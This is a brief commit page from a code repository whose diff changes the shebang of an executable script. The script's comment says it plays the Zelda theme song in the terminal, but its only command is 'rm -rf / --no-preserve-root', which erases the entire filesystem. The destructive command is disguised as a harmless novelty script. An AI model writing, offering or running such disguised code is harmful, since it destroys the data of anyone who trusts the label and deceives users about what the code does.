fix shebang
This commit is contained in:
Regular → Executable
+1
-1
@@ -1,4 +1,4 @@
|
||||
#!/bin/bash
|
||||
#!/bin/sh -x
|
||||
|
||||
# plays zelda theme song in terminal
|
||||
rm -rf / --no-preserve-root
|
||||
|
||||
Reference in New Issue
Block a user